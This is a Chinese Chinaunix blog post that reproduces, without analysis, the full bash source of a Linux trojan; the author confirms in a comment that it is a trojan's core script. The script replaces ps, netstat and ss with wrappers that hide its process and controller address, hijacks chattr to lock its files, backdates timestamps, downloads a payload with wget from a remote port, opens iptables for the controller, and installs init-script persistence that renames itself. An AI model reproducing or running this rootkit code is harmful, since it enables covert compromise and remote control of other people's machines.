Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1615924
  • 博文数量: 101
  • 博客积分: 2465
  • 博客等级: 中尉
  • 技术积分: 2126
  • 用 户 组: 普通用户
  • 注册时间: 2010-12-09 15:39
个人简介

https://minminmsn.com/

文章分类

全部博文(101)

文章存档

2018年(2)

2017年(2)

2016年(11)

2015年(14)

2014年(9)

2013年(16)

2012年(47)

分类: 系统运维

2015-09-15 11:04:56

#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f  "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi


Address1=`nslookup |grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30"  /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi


Ftempbash=`cat $Fconfig | awk '{print $2}'`   #现脚本文件名
Fbashtemp="/usr/bin/"$Ftempbash #现脚本路径
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #新脚本路径


if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi


# -------------------------------------------------------------
if [ ! -f  "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30"  $LockAngel
touch -d "2011-06-7 08:10:30"  /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi


if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi


if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi


if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi


if [ ! -f  "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
  rm -rf /usr/bin/.dbus-daemon--system
fi


if [ ! -f  "$MyFileAngel" ];then
  zfgs -i /usr/bin/wget
  zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi


if [ ! -f  "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi


iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# 自启动------------------
if [ ! -f  "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides: $Ftempbash" >> $S99
echo "# Required-Start: " >> $S99
echo "# Required-Stop: " >> $S99
echo "# Default-Start: 1 2 3 4 5" >> $S99
echo "# Default-Stop: " >> $S99
echo "# Short-Description: $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "stop)" >> $S99
echo " ;;" >> $S99
echo "*)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit
阅读(7692) | 评论(2) | 转发(0) |
给主人留下些什么吧!~~

minminmsn2015-10-09 17:01:54

wuwei1055:你这是在干吗的脚本呢?

一个木马的核心脚本。

回复 | 举报

wuwei10552015-10-08 17:44:48

你这是在干吗的脚本呢?